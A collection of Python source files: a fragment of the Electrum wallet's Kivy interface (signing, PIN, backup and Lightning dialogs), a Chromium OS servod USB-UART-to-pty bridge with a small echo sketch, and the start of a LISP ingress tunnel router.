LightningTxDialog d = LightningTxDialog(self, tx) d.open() def sign_tx(self, *args): threading.Thread(target=self._sign_tx, args=args).start() def _sign_tx(self, tx, password, on_success, on_failure): try: self.wallet.sign_transaction(tx, password) except InvalidPassword: Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN"))) return on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success Clock.schedule_once(lambda dt: on_success(tx)) def _broadcast_thread(self, tx, on_complete): status = False try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: msg = e.get_message_for_gui() except BestEffortRequestFailed as e: msg = repr(e) else: status, msg = True, tx.txid() Clock.schedule_once(lambda dt: on_complete(status, msg)) def broadcast(self, tx): def on_complete(ok, msg): if ok: self.show_info(_('Payment sent.')) if self.send_screen: self.send_screen.do_clear() else: msg = msg or '' self.show_error(msg) if self.network and self.network.is_connected(): self.show_info(_('Sending')) threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start() else: self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected')) def description_dialog(self, screen): from .uix.dialogs.label_dialog import LabelDialog text = screen.message def callback(text): screen.message = text d = LabelDialog(_('Enter description'), text, callback) d.open() def amount_dialog(self, screen, show_max): from .uix.dialogs.amount_dialog import AmountDialog amount = screen.amount if amount: amount, u = str(amount).split() assert u == self.base_unit def cb(amount): if amount == '!': screen.is_max = True max_amt = self.get_max_amount() screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else '' else: screen.amount = amount screen.is_max = False popup = AmountDialog(show_max, amount, cb) popup.open() def addresses_dialog(self): from .uix.dialogs.addresses import AddressesDialog if 
self._addresses_dialog is None: self._addresses_dialog = AddressesDialog(self) self._addresses_dialog.update() self._addresses_dialog.open() def fee_dialog(self): from .uix.dialogs.fee_dialog import FeeDialog fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status) fee_dialog.open() def set_fee_status(self): target, tooltip, dyn = self.electrum_config.get_fee_target() self.fee_status = target def on_fee(self, event, *arg): self.set_fee_status() def protected(self, msg, f, args): if self.electrum_config.get('pin_code'): msg += "\n" + _("Enter your PIN code to proceed") on_success = lambda pw: f(*args, self.password) d = PincodeDialog( self, message = msg, check_password=self.check_pin_code, on_success=on_success, on_failure=lambda: None) d.open() else: d = Question( msg, lambda b: f(*args, self.password) if b else None, yes_str=_("OK"), no_str=_("Cancel"), title=_("Confirm action")) d.open() def delete_wallet(self): basename = os.path.basename(self.wallet.storage.path) d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet) d.open() def _delete_wallet(self, b): if b: basename = self.wallet.basename() self.protected(_("Are you sure you want to delete wallet {}?").format(basename), self.__delete_wallet, ()) def __delete_wallet(self, pw): wallet_path = self.get_wallet_path() basename = os.path.basename(wallet_path) if self.wallet.has_password(): try: self.wallet.check_password(pw) except InvalidPassword: self.show_error("Invalid password") return self.stop_wallet() os.unlink(wallet_path) self.show_error(_("Wallet removed: {}").format(basename)) new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True) self.load_wallet_by_name(new_path) def show_seed(self, label): self.protected(_("Display your seed?"), self._show_seed, (label,)) def _show_seed(self, label, password): if self.wallet.has_password() and password is None: return keystore = self.wallet.keystore seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) label.data = seed if passphrase: label.data += '\n\n' + _('Passphrase') + ': ' + passphrase def has_pin_code(self): return bool(self.electrum_config.get('pin_code')) def check_pin_code(self, pin): if pin != self.electrum_config.get('pin_code'): raise InvalidPassword def change_password(self, cb): def on_success(old_password, new_password): # called if old_password works on self.wallet self.password = new_password if self._use_single_password: path = self.wallet.storage.path self.stop_wallet() update_password_for_directory(self.electrum_config, old_password, new_password) self.load_wallet_by_name(path) msg = _("Password updated successfully") else: self.wallet.update_password(old_password, new_password) msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path)) self.show_info(msg) on_failure = lambda: self.show_error(_("Password not updated")) d = ChangePasswordDialog(self, self.wallet, on_success, on_failure) d.open() def pin_code_dialog(self, cb): if self._use_single_password and self.has_pin_code(): def on_choice(choice): if choice == 0: self.change_pin_code(cb) else: self.reset_pin_code(cb) choices = {0:'Change PIN code', 1:'Reset PIN'} dialog = ChoiceDialog( _('PIN Code'), choices, 0, on_choice, keep_choice_order=True) dialog.open() else: self.change_pin_code(cb) def reset_pin_code(self, cb): on_success = lambda x: self._set_new_pin_code(None, cb) d = PasswordDialog(self, basename = self.wallet.basename(), check_password = self.wallet.check_password, on_success=on_success, 
on_failure=lambda: None, is_change=False, has_password=self.wallet.has_password()) d.open() def _set_new_pin_code(self, new_pin, cb): self.electrum_config.set_key('pin_code', new_pin) cb() self.show_info(_("PIN updated") if new_pin else _('PIN disabled')) def change_pin_code(self, cb): on_failure = lambda: self.show_error(_("PIN not updated")) on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb) d = PincodeDialog( self, check_password=self.check_pin_code, on_success=on_success, on_failure=on_failure, is_change=True, has_password = self.has_pin_code()) d.open() def save_backup(self): if platform != 'android': backup_dir = self.electrum_config.get_backup_dir() if backup_dir: self._save_backup(backup_dir) else: self.show_error(_("Backup NOT saved. Backup directory not configured.")) return from android.permissions import request_permissions, Permission def cb(permissions, grant_results: Sequence[bool]): if not grant_results or not grant_results[0]: self.show_error(_("Cannot save backup without STORAGE permission")) return # note: Clock.schedule_once is a hack so that we get called on a non-daemon thread # (needed for WalletDB.write) backup_dir = util.android_backup_dir() Clock.schedule_once(lambda dt: self._save_backup(backup_dir)) request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb) def _save_backup(self, backup_dir): try: new_path = self.wallet.save_backup(backup_dir) except Exception as e: self.logger.exception("Failed to save wallet backup") self.show_error("Failed to save wallet backup" + '\n' + str(e)) return self.show_info(_("Backup saved:") + f"\n{new_path}") def export_private_keys(self, pk_label, addr): if self.wallet.is_watching_only(): self.show_info(_('This is a watching-only wallet. It does not contain private keys.')) return def show_private_key(addr, pk_label, password): if self.wallet.has_password() and password is None: return if not self.wallet.can_export(): return try: key = str(self.wallet.export_private_key(addr, password)) pk_label.data = key except InvalidPassword: self.show_error("Invalid PIN") return self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label)) def import_channel_backup(self, encrypted): d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted)) d.open() def _import_channel_backup(self, b, encrypted): if not b: return try: self.wallet.lnworker.import_channel_backup(encrypted) except Exception as e: self.logger.exception("failed to import backup") self.show_error("failed to import backup" + '\n' + str(e)) return self.lightning_channels_dialog() def lightning_status(self): if self.wallet.has_lightning(): if self.wallet.lnworker.has_deterministic_node_id(): status = _('Enabled') else: status = _('Enabled, non-recoverable channels') else: if self.wallet.can_have_lightning(): status = _('Not enabled') else: status = _("Not available for this wallet.") return status def on_lightning_status(self, root): if self.wallet.has_lightning(): if self.wallet.lnworker.has_deterministic_node_id(): pass else: if self.wallet.db.get('seed_type') == 'segwit': msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. " "This means that you must save a backup of your wallet everytime you create a new channel.\n\n" "If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed") else: msg = _("Your channels cannot be recovered from seed. 
" "This means that you must save a backup of your wallet everytime you create a new channel.\n\n" "If you want to have recoverable channels, you must create a new wallet with an Electrum seed") self.show_info(msg) elif self.wallet.can_have_lightning(): root.dismiss() if self.wallet.can_have_deterministic_lightning(): msg = _( "Lightning is not enabled because this wallet was created with an old version of Electrum. " "Create lightning keys?") else: msg = _( "Warning: this wallet type does not support channel recovery from seed. " "You will need to backup your wallet everytime you create a new wallet. " "Create lightning keys?") d = Question(msg, self._enable_lightning, title=_('Enable Lightning?')) d.open() def _enable_lightning(self, b): if not b: return self.wallet.init_lightning(password=self.password) self.show_info(_('Lightning keys have been initialized.'))
stm32uart.py
# Copyright 2016 The Chromium OS Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Allow creation of uart/console interface via stm32 usb endpoint.""" import errno import exceptions import logging import os import select import sys import termios import threading import time import tty import common as c import stm32usb import uart import usb class SuartError(c.InterfaceError): """Class for exceptions of Suart.""" def __init__(self, msg, value=0): """SuartError constructor. Args: msg: string, message describing error in detail value: integer, value of error when non-zero status returned. Default=0 """ super(SuartError, self).__init__(msg, value) self.msg = msg self.value = value class Suart(uart.Uart): """Provide interface to stm32 serial usb endpoint.""" USB_USART_SET_PARITY = 1 USB_USART_SET_BAUD = 3 USB_USART_BAUD_MULTIPLIER = 100 def __init__(self, vendor=0x18d1, product=0x501a, interface=0, serialname=None, ftdi_context=None): """Suart contstructor. Initializes stm32 USB stream interface. Args: vendor: usb vendor id of stm32 device product: usb product id of stm32 device interface: interface number of stm32 device to use serialname: n/a. Defaults to None. ftdi_context: n/a. Defaults to None. Raises: SuartError: If init fails """ super(Suart, self).__init__() self._logger = logging.getLogger('Suart') self._logger.debug('') self._logger.debug('Suart opening %04x:%04x, intf %d, sn: %s' % (vendor, product, interface, serialname)) self._props = {} self._done = threading.Event() self._susb = stm32usb.Susb(vendor=vendor, product=product, interface=interface, serialname=serialname, logger=self._logger) self._logger.debug('Set up stm32 uart') @staticmethod def Build(vid, pid, sid, interface_data, **kwargs): """Factory method to implement the interface.""" c.build_logger.info('Suart: interface: %s' % interface_data) sobj = Suart(vendor=vid, product=pid, interface=interface_data['interface'], serialname=sid) sobj.run() c.build_logger.info('%s' % sobj.get_pty()) return sobj @staticmethod def name(): """Name to request interface by in interface config maps.""" return 'stm32_uart' def close(self): """Suart wind down logic.""" self._done.set() for t in [self._rx_thread, self._tx_thread]: t.join(timeout=0.2) del self._susb def reinitialize(self): """Reinitialize the usb endpoint""" self._susb.reset_usb() def get_device_info(self): """The usb device information.""" return self._susb.get_device_info() def run_rx_thread(self): self._logger.debug('rx thread started on %s' % self.get_pty()) ep = select.epoll() ep.register(self._ptym, select.EPOLLHUP) while not self._done.is_set(): events = ep.poll(0) # Check if the pty is connected to anything, or hungup. if not events: try: r = self._susb.read_ep(256, self._susb.TIMEOUT_MS) if r: os.write(self._ptym, r) except Exception as e: # If we miss some characters on pty disconnect, that's fine. # ep.read() also throws USBError on timeout, which we discard. if type(e) not in [exceptions.OSError, usb.core.USBError]: self._logger.debug('rx %s: %s' % (self.get_pty(), e)) else: self._done.wait(.1) def run_tx_thread(self): self._logger.debug('tx thread started on %s' % self.get_pty()) ep = select.epoll() readp = select.epoll() ep.register(self._ptym, select.EPOLLHUP) readp.register(self._ptym, select.EPOLLIN) while not self._done.is_set(): events = ep.poll(0) # Check if the pty is connected to anything, or hungup. 
if not events: try: if readp.poll(.1): r = os.read(self._ptym, 64) # TODO(crosbug.com/936182): Remove when the servo v4/micro console # issues are fixed. time.sleep(0.001) if r: self._susb.write_ep(r, self._susb.TIMEOUT_MS) except IOError as e: self._logger.debug('tx %s: %s' % (self.get_pty(), e)) if e.errno == errno.ENODEV: self._logger.error('USB disconnected 0x%04x:%04x, servod failed.', self._susb._vendor, self._susb._product) raise except Exception as e: self._logger.debug('tx %s: %s' % (self.get_pty(), e)) else: self._done.wait(.1) def run(self): """Creates pthreads to poll stm32 & PTY for data. """ self._logger.debug('') m, s = os.openpty() self._ptyname = os.ttyname(s) self._logger.debug('PTY name: %s' % self._ptyname) self._ptym = m self._ptys = s os.fchmod(s, 0o660) # Change the owner and group of the PTY to the user who started servod. try: uid = int(os.environ.get('SUDO_UID', -1)) except TypeError: uid = -1 try: gid = int(os.environ.get('SUDO_GID', -1)) except TypeError: gid = -1 os.fchown(s, uid, gid) tty.setraw(self._ptym, termios.TCSADRAIN) # Generate a HUP flag on pty child fd. os.fdopen(s).close() self._logger.debug('stm32 uart pty is %s' % self.get_pty()) self._rx_thread = threading.Thread(target=self.run_rx_thread, args=[]) self._rx_thread.daemon = True self._tx_thread = threading.Thread(target=self.run_tx_thread, args=[]) self._tx_thread.daemon = True self._tx_thread.start() self._rx_thread.start() self._logger.debug('stm32 rx and tx threads started.') def get_uart_props(self): """Get the uart's properties. Returns: dict where: baudrate: integer of uarts baudrate bits: integer, number of bits of data Can be 5|6|7|8 inclusive parity: integer, parity of 0-2 inclusive where: 0: no parity 1: odd parity 2: even parity sbits: integer, number of stop bits. Can be 0|1|2 inclusive where: 0: 1 stop bit 1: 1.5 stop bits 2: 2 stop bits """ self._logger.debug('') if not self._props: self._props = {'baudrate': 115200, 'bits': 8, 'parity': 0, 'sbits': 1} return self._props.copy() def set_uart_props(self, line_props): """Set the uart's properties. Note that Suart cannot set properties and will fail if the properties are not the default 115200,8n1. Args: line_props: dict where: baudrate: integer of uarts baudrate bits: integer, number of bits of data ( prior to stop bit) parity: integer, parity of 0-2 inclusive where 0: no parity 1: odd parity 2: even parity sbits: integer, number of stop bits. Can be 0|1|2 inclusive where: 0: 1 stop bit 1: 1.5 stop bits 2: 2 stop bits Raises: SuartError: If requested line properties are not possible. """ self._logger.debug('') curr_props = self.get_uart_props() for prop in line_props: if line_props[prop] != curr_props[prop]: if (prop == 'baudrate' and (line_props[prop] % self.USB_USART_BAUD_MULTIPLIER) == 0): self._susb.control(self.USB_USART_SET_BAUD, line_props[prop] / self.USB_USART_BAUD_MULTIPLIER) elif prop == 'parity' and line_props[prop] in [0, 1, 2]: self._susb.control(self.USB_USART_SET_PARITY, line_props[prop]) else: raise SuartError('Line property %s cannot be set from %s to %s' % (prop, curr_props[prop], line_props[prop])) self._props = line_props.copy() return True def get_pty(self): """Gets path to pty for communication to/from uart. 
Returns: String path to the pty connected to the uart """ self._logger.debug('') return self._ptyname def test(): format = '%(asctime)s - %(name)s - %(levelname)s' loglevel = logging.INFO if True: loglevel = logging.DEBUG format += ' - %(filename)s:%(lineno)d:%(funcName)s' format += ' - %(message)s' logging.basicConfig(level=loglevel, format=format) logger = logging.getLogger(os.path.basename(sys.argv[0])) logger.info('Start') sobj = Suart() sobj.run() logging.info('%s', sobj.get_pty()) # run() is a thread so just busy wait to mimic server while True: # ours sleeps to eleven! time.sleep(11) if __name__ == '__main__': try: test() except KeyboardInterrupt: sys.exit(0)
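# Suart.run() boils down to: open a pty pair, publish the slave's path as the
# console device, and move bytes between the master fd and the USB endpoint
# from background threads. The sketch below keeps just that skeleton, with a
# simple echo loop standing in for the stm32 USB endpoint (an assumption for
# illustration only); like the original, it is Unix-only.
import os
import threading
import tty

def start_echo_bridge():
    master, slave = os.openpty()
    tty.setraw(master)  # raw mode: no echo, no line buffering (as in Suart.run)

    def service_master():
        # Stand-in for run_rx_thread/run_tx_thread: copy bytes straight back.
        while True:
            data = os.read(master, 256)
            if not data:
                break
            os.write(master, data)

    threading.Thread(target=service_master, daemon=True).start()
    return slave, os.ttyname(slave)

if __name__ == "__main__":
    slave_fd, pty_name = start_echo_bridge()
    print("pty is", pty_name)
    os.write(slave_fd, b"hello\n")
    print("echoed back:", os.read(slave_fd, 6))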
lisp-itr.py
# ----------------------------------------------------------------------------- # # Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ----------------------------------------------------------------------------- # # lisp-itr.py # # This file performs LISP Ingress Tunnel Router (ITR) functionality. # # ----------------------------------------------------------------------------- from future import standard_library standard_library.install_aliases() from builtins import str from builtins import range import lisp import lispconfig import socket import select import threading import time import os from subprocess import getoutput import struct #------------------------------------------------------------------------------ # # Global data structures relative to the lisp-itr process. # lisp_send_sockets = [None, None, None] lisp_ipc_listen_socket = None lisp_ipc_punt_socket = None lisp_ephem_listen_socket = None lisp_ephem_nat_socket = None lisp_rloc_probe_socket = None lisp_ephem_port = lisp.lisp_get_ephemeral_port() lisp_ephem_nat_port = lisp.lisp_get_ephemeral_port() lisp_raw_socket = None lisp_raw_v6_socket = None lisp_periodic_timer = None lisp_itr_info_timer = None # # This is for testing sending from one local EID-prefix to another EID-prefix # on the same system. Rather than natively forwarding a packet, the mapping # system is used. # lisp_xtr_loopback = False # # Used to start pcap threads concurrently. # lisp_pcap_lock = threading.Lock() #------------------------------------------------------------------------------ # # lisp_itr_show_command # # Display state in an ITR. # def lisp_itr_show_command(parameter): return(lispconfig.lisp_itr_rtr_show_command(parameter, "ITR", [])) #enddef # # lisp_itr_show_keys_command # # Call lispconfig.lisp_show_crypto_list(). # def lisp_itr_show_keys_command(parameter): return(lispconfig.lisp_show_crypto_list("ITR")) #enddef # # lisp_itr_show_rloc_probe_command # # Display RLOC-probe list state in an ITR. # def lisp_itr_show_rloc_probe_command(parameter): return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("ITR")) #enddef # # lisp_itr_process_timer # # This is the ITR's 60-second periodic timer routine. We typically use it # to time-out map-cache entries. But the one case where we are acting as # a L2-overlay ITR, we will send Map-Requests to retrieve the broadcast # entry so we have the latest replication-list before we need it. # def lisp_itr_process_timer(lisp_sockets, lisp_ephem_port): lisp.lisp_set_exception() # # Remove nonce entries from crypto-list. # for keys in list(lisp.lisp_crypto_keys_by_nonce.values()): for key in keys: del(key) #endfor lisp.lisp_crypto_keys_by_nonce = {} # # If doing L2-overlays, get map-cache entry from (0000-0000-0000/0, # ffff-ffff-ffff/48). 
# if (lisp.lisp_l2_overlay): afi = lisp.LISP_AFI_MAC iid = lisp.lisp_default_iid s = lisp.lisp_address(afi, "0000-0000-0000", 0, iid) s.mask_len = 0 d = lisp.lisp_address(afi, "ffff-ffff-ffff", 48, iid) lisp.lisp_send_map_request(lisp_sockets, lisp_ephem_port, s, d, None) #endif # # Timeout Map-Cache entries. # lisp.lisp_timeout_map_cache(lisp.lisp_map_cache) # # Restart periodic timer. # lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer, [lisp_sockets, lisp_ephem_port]) lisp_periodic_timer.start() return #enddef # # lisp_itr_timeout_dynamic_eids # # Check to see if dyanmic-EIDs have stop sending data. If so, remove the # state and stop registering them. # def lisp_itr_timeout_dynamic_eids(lisp_socket): lisp.lisp_set_exception() now = lisp.lisp_get_timestamp() for db in lisp.lisp_db_list: if (db.dynamic_eid_configured() == False): continue delete_list = [] for dyn_eid in list(db.dynamic_eids.values()): ts = dyn_eid.last_packet if (ts == None): continue if (ts + dyn_eid.timeout > now): continue # # Check hardware if dyn-EID has had packets SENT to. We want the # opposite but this is all we get from Arista. # if (lisp.lisp_program_hardware): prefix = dyn_eid.dynamic_eid.print_prefix_no_iid() if (lisp.lisp_arista_is_alive(prefix)): lisp.lprint(("Hardware indicates dynamic-EID {} " + \ "still active").format(lisp.green(prefix, False))) continue #endif #endif # # Tell ETR process so it can register dynamic-EID. # eid_str = dyn_eid.dynamic_eid.print_address() ipc = "learn%{}%None".format(eid_str) ipc = lisp.lisp_command_ipc(ipc, "lisp-itr") lisp.lisp_ipc(ipc, lisp_socket, "lisp-etr") lisp.lprint("Dynamic-EID {}".format( \ lisp.bold(lisp.green(eid_str, False) + " activity timeout", False))) delete_list.append(eid_str) #endfor # # Remove the timed out entries from db.dynamic_eids{}. # for eid_str in delete_list: db.dynamic_eids.pop(eid_str) #endfor # # Restart periodic timer. # threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT, lisp_itr_timeout_dynamic_eids, [lisp_socket]).start() return #enddef # # lisp_get_active_interfaces # # Get interfaces that are plugged in. Including loopback interfaces. # # We need to test these 3 types of lines from "ifconfig" output: # # aten2 Link encap:Ethernet HWaddr 00:1F:A0:07:0C:04 # eth7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 # en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 # def lisp_get_active_interfaces(): # # Choose only actively connected physical interfaces. Plus loopback. This # is needed for a roaming MAC to do telemetry measurements and wants to # connect to an ethernet. Each dongle vendor comes in with a different # interface/device name. # if (lisp.lisp_is_macos()): lines = getoutput("netstat -rn | egrep default | egrep UGS") interfaces = ["lo0"] for line in lines.split("\n"): intf = line.split()[-1] interfaces.append(intf) #endfor return(interfaces) #endif # # Linux distributions have different ifconfig output format. # gs = "Link encap" interfaces = getoutput("ifconfig | egrep '{}'".format(gs)) if (interfaces == ""): gs = ": flags=" interfaces = getoutput("ifconfig | egrep '{}'".format(gs)) #endif interfaces = interfaces.split("\n") return_interfaces = [] for interface in interfaces: ifname = interface.split(gs)[0].replace(" ", "") return_interfaces.append(ifname) #endfor return(return_interfaces) #enddef # # lisp_itr_startup # # Intialize this LISP ITR process. This function returns no values. 
# def lisp_itr_startup(): global lisp_send_sockets global lisp_ipc_listen_socket global lisp_ipc_punt_socket global lisp_ephem_listen_socket global lisp_ephem_nat_socket global lisp_raw_socket, lisp_raw_v6_socket global lisp_rloc_probe_socket lisp.lisp_i_am("itr") lisp.lisp_set_exception() lisp.lisp_print_banner("ITR starting up") # # Get local address for source RLOC for encapsulation. # lisp.lisp_get_local_interfaces() lisp.lisp_get_local_macs() if (lisp.lisp_get_local_addresses() == False): return(False) # # Open send socket. # lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4) lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6) lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-itr") lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr") lisp_send_sockets[2] = lisp_ipc_listen_socket address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0" lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address, str(lisp_ephem_port)) # # Set multicsat TTL to LISP_RLOC_PROBE_TTL so we can send RLOC-probes # to multicast RLOCs. # try: s = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4) ttl = lisp.LISP_RLOC_PROBE_TTL s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl) lisp_rloc_probe_socket = s except socket.error as e: lisp.lprint("socket.setsockopt() failed for RLOC-probe ttl: {}". \ format(e)) #endtry # # Used on for listening for Info-Replies for NAT-traversal support. # lisp_ephem_nat_socket = lisp.lisp_open_listen_socket("0.0.0.0", str(lisp_ephem_nat_port)) # # Open up raw socket so we can send with IP headers after decapsulation. # lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) if (lisp.lisp_is_raspbian() == False): lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_UDP) #endif # # This is used by the ITR to send RTR status change information to the # ETR. Since RLOC-probing runs inside the lisp library, when state changes # occur, an IPC will have to be sent from the timer thread. This is the # only use-case for lisp.lisp_ipc_socket. # lisp.lisp_ipc_socket = lisp_ipc_listen_socket # # Start map-cache timeout timer. # threading.Thread(target=lisp_itr_get_capture_info).start() # # Load map-cache from checkpoint file before we start writing to it. # lisp.lisp_load_checkpoint() # # Should we load-split pings? # lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None) # # Start map-cache timeout timer. # lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer, [lisp_send_sockets, lisp_ephem_port]) lisp_periodic_timer.start() # # Start dynamic-EID timeout timer. # threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT, lisp_itr_timeout_dynamic_eids, [lisp_ipc_listen_socket]).start() return(True) #enddef # # lisp_itr_count_eid_prefixes # # Cound the number of "prefix" sub-commands inside of each "lisp database- # mapping" command. # def lisp_itr_count_eid_prefixes(): f = open("./lisp.config", "r") within = False count = 0 for line in f: if (line == "lisp database-mapping {\n"): within = True if (line == "}\n"): within = False if (within == False): continue if (line[0] == " " and line.find("prefix {") != -1): count += 1 #endif f.close() return(count) #enddef # # lisp_itr_get_local_eid_prefixes # # Check the number of "lisp database-mapping" commands we will process. Wait # for them to be processed and only return when all are processed. 
# # Return array of static EID-prefixes and an array of dynamic EID-prefixes. # def lisp_itr_get_local_eid_prefixes(): # # Count the number of "prefix" sub-commands within a "lisp database- # mapping" command clause in the lisp.config file. # count = lisp_itr_count_eid_prefixes() # # Does user want us to wait longer than a second to check to see if # commands are done. If the CPU is going to be busy during startup, the # wait-time should be made longer.. # wait_time = os.getenv("LISP_ITR_WAIT_TIME") wait_time = 1 if (wait_time == None) else int(wait_time) # # Wait for database-mapping commands to execute. We need to retrieve # EID-prefixes we need to listen on. # while (count != len(lisp.lisp_db_list)): lisp.lprint(("Waiting {} second(s) for {} database-mapping EID-" + \ "prefixes, {} processed so far ...").format(wait_time, count, len(lisp.lisp_db_list))) time.sleep(wait_time) #endwhile # # Return each IPv4, IPv6, or MAC EIDs. These are the ones we need to # pass to pcap. # sources = [] dyn_eids = [] for db in lisp.lisp_db_list: if (db.eid.is_ipv4() or db.eid.is_ipv6() or db.eid.is_mac()): eid_str = db.eid.print_prefix_no_iid() if (db.dynamic_eid_configured()): dyn_eids.append(eid_str) sources.append(eid_str) #endif #endfor return(sources, dyn_eids) #enddef # # lisp_itr_get_capture_info # # Thead to wait for database-mapping commands to finish processing so we can # get local EID-prefixes to be source filters for packet capture. # def lisp_itr_get_capture_info(): global lisp_pcap_lock lisp.lisp_set_exception() # # Wait for database-mapping commands to execute. We need to retrieve # EID-prefixes we need to listen on. # sources, dyn_eids = lisp_itr_get_local_eid_prefixes() # # If "ipc-data-plane = yes" is configured, we do not need to do any # data-plane forwarding. There is another module running with the # lispers.net control-plane that is doing data-plane forwarding. We'll # get punts via the lispers.net-itr named socket. But we do have to # packet capture RLOC-probe replies. Also capture multicast Map-Register # messages for LISP-Decent. # cp_pfilter = None if (lisp.lisp_ipc_data_plane): lisp.lprint(lisp.bold("Data-plane packet capture disabled", False)) cp_pfilter = "(udp src port 4342 and ip[28] == 0x28)" + \ " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)" lisp.lprint("Control-plane capture: '{}'".format(cp_pfilter)) else: lisp.lprint("Capturing packets for source-EIDs {}".format( \ lisp.green(str(sources), False))) #endif if (lisp.lisp_pitr): lisp.lprint("Configured for PITR functionality") # # We want the kernel to handle any packets with source AND destination # that matches any EID-prefixes for the site. Any other case, we want # the pcap filters to get the packet to this lisp-itr process. # l2_overlay = lisp.lisp_l2_overlay if (l2_overlay == False): if (lisp.lisp_is_linux()): lisp_itr_kernel_filter(sources, dyn_eids) #endif # # Build packet capture filter so we get packets for configured source EID- # prefixes. # if (cp_pfilter == None): if (lisp.lisp_pitr): pfilter = lisp_itr_build_pcap_filter(sources, [], False, True) else: pfilter = lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay, False) #endif else: pfilter = cp_pfilter #endif # # User can select which interfaces to pcap on. 
# interfaces = lisp_get_active_interfaces() pcap_list = os.getenv("LISP_PCAP_LIST") lisp.lprint("User pcap-list: {}, active-interfaces: {}".format(pcap_list, interfaces)) if (pcap_list == None): us = "" rloc_interfaces = [] else: eid_interfaces = list(set(pcap_list.split()) & set(interfaces)) rloc_interfaces = list(set(pcap_list.split()) ^ set(interfaces)) us = "user-selected " interfaces = eid_interfaces #endif # # Start a pcap thread so we can receive packets from applications on this # system. But make sure the device is up on A10 devices. If ethernet MAC # capturing, do not listen on non ethernet interfaces. # mac_capturing = (pfilter.find("ether host") != -1) for device in interfaces: if (device in ["lo", "lispers.net"] and mac_capturing): lisp.lprint(("Capturing suppressed on interface {}, " + \ "MAC filters configured").format(device)) continue #endif args = [device, pfilter, lisp_pcap_lock] lisp.lprint("Capturing packets on {}interface {}".format(us, device)) threading.Thread(target=lisp_itr_pcap_thread, args=args).start() #endfor if (cp_pfilter): return # # Start a pcap thread so we can receive RLOC-probe Map-Replies packets on # RLOC interfaces. This is only called when LISP_PCAP_LIST is set. # probe_pfilter = "(udp src port 4342 and ip[28] == 0x28)" for device in rloc_interfaces: args = [device, probe_pfilter, lisp_pcap_lock] lisp.lprint("Capture RLOC-probe replies on RLOC interface {}".format( \ device)) threading.Thread(target=lisp_itr_pcap_thread, args=args).start() #endfor return #enddef # # lisp_itr_shutdown # # Shut down this process. # def lisp_itr_shutdown(): # # Cancel periodic Info timer threads. # if (lisp_itr_info_timer): lisp_itr_info_timer.cancel() # # Close sockets. # lisp.lisp_close_socket(lisp_send_sockets[0], "") lisp.lisp_close_socket(lisp_send_sockets[1], "") lisp.lisp_close_socket(lisp_ephem_listen_socket, "") lisp.lisp_close_socket(lisp_rloc_probe_socket, "") lisp.lisp_close_socket(lisp_ephem_nat_socket, "") lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-itr") lisp.lisp_close_socket(lisp_ipc_punt_socket, "lispers.net-itr") return #enddef # # lisp_itr_data_plane # # Do map-cache lookup and encapsulate packet. # def lisp_itr_data_plane(packet, device, input_interface, macs, my_sa): global lisp_send_sockets global lisp_ephem_port global lisp_raw_socket, lisp_raw_v6_socket global lisp_ipc_listen_socket # # Check RLOC-probe Map-Reply. We need to grab the TTL from IP header. # orig_packet = packet packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 1) if (orig_packet != packet): if (source == None): return lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl) return #endif packet = lisp.lisp_packet(packet) if (packet.decode(False, None, None) == None): return # # For locally source packets from this system, the MAC address may # be the default router. Check source to see if assigned to this system, # and if so, accept on interface "device". # if (my_sa): input_interface = device # # Get instance-ID for incoming interface. # source_eid = packet.inner_source iid = lisp.lisp_get_interface_instance_id(input_interface, source_eid) 